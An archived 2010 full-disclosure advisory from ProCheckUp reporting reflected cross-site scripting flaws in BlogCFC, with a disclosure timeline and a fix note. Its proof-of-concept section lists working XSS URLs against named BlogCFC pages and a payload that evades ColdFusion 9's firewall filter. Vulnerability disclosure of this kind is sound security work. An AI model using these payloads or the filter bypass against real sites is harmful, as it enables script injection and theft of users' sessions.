| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 14 Dec 2010 17:40:42 +0000
From: research <research@...checkup.com>
To: "vuln@...unia.com" <vuln@...unia.com>,
"full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>,
"bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
"news@...uriteam.com" <news@...uriteam.com>,
"submit@...sec" <submit@...sec.lists.grok.org.uk>
Subject: PR10-10 Various Cross-Site Scripting
Vulnerabilities (XSS) within BlogCFC
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-10
PR10-10 Various XSS within BlogCFC
* Advisory publicly released: Tuesday, 14 December 2010
* Vulnerability found: Sunday, 2 May 2010
* Vendor informed: Monday, 3 May 2010
* Vulnerability fixed: Wednesday, 19 May 2010
* Severity level: Medium
* Credits
Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com<http://www.procheckup.com>)
* Description
BlogCFC is a ColdFusion based blogging System.Procheckup has discovered that Various BlogCFC programs are vulnerable to generic reflective Cross Site Scripting (XSS) attacks.
Note: BlogCFC was tested on a fully patched Windows XP machine, ColdFusion 8 (unpatched) and SQL 2005 were used from the application server and the backend database.
Note: Coldfusion 9 includes a application firewall and will replace any <script> tag, To circumvent this the
<script>alert(1)</script> needs to be substituted with a tag not on the match list like </XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")> (this works on IE7 & IE6)
BlogCFC Versions tested
5.9.6.001
* Proof of concept
Unauthenticated vanilla XSS. IE7 (Internet Explorer) browser used.
http://target-domain.foo/tags/podlayout.cfm?ATTRIBUTES.TITLE=<script>alert(1)</script>&thistag.EXECUTIONMODE=start
http://target-domain.foo/tags/textarea.cfm?attributes.class="></textarea><script>alert(1)</script>&attributes.fieldname=Procheckup&attributes.style=1&attributes.value=1&
http://target-domain.foo/includes/pods/subscribe.cfm?errorMessage="><script>alert(1)</script>
http://target-domain.foo/index.cfm?errorMessage="><script>alert(1)</script>
The following works due to the error page not sufficiently filtering tags on unpatched Coldfusion 8
http://target-domain.foo/stats.cfm?dur='</XSS STYLE=xss:expression(location='http://www.procheckup.com')>
The following examples the Mouse has to be moved over the subscribe input box
http://target-domain.foo/includes/pods/subscribe.cfm?"onmouseover="alert(1);
http://target-domain.foo/index.cfm?"onmouseover="alert(1);
http://target-domain.foo/search.cfm?"onmouseover="alert(1);
http://target-domain.foo/stats.cfm?"onmouseover="alert(1);
http://target-domain.foo/statsbyyear.cfm?"onmouseover="alert(1);
http://target-domain.foo/tags/getpods.cfm?"onmouseover="alert(1);
* How to fix
Apply the latest patched version.
* References
* Legal
Copyright 2010 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.
Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to
Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.
Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists